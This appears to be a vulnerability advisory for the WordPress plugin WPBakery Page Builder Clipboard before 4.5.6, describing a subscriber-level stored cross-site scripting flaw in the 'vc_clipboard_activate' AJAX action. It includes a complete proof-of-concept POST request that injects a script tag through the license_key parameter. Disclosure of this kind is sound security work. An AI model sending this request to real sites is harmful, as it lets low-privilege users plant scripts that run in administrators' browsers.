WPBakery Page Builder Clipboard < 4.5.6 - Subscriber+ Stored Cross-Site Scripting (XSS)
Description
An AJAX action registered by the plugin did not have capability checks nor sanitization, allowing low privilege users (subscriber+) to call it and set XSS payloads, which will be triggered in all backend pages. Version 4.5.6 fixed the XSS issue with sanitization of the parameters, but did not fix the Subscriber+ options update. See additional related vulnerability patched in version 4.5.8.
Proof of Concept
When logged in as a user with Subcriber role or greater, submit a request to wp-admin/admin-ajax.php with action = "vc_clipboard_activate" and Javascript can be set in the "email" or "license_key" parameters. POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 101 Connection: close Cookie: [Subscriber+ cookies] action=vc_clipboard_activate&email=alertfoo&license_key=</script><script>alert(123);</script><script>
Affects Plugins
Fixed in version 4.5.6✓
Classification
Miscellaneous
Original Researcher
Charles Strader Sweethill
Submitter
Charles Strader Sweethill
Submitter website
Verified
Yes
Timeline
Publicly Published
2021-04-03 (about 3 months ago)
Added
2021-04-06 (about 3 months ago)
Last Updated
2021-04-07 (about 3 months ago)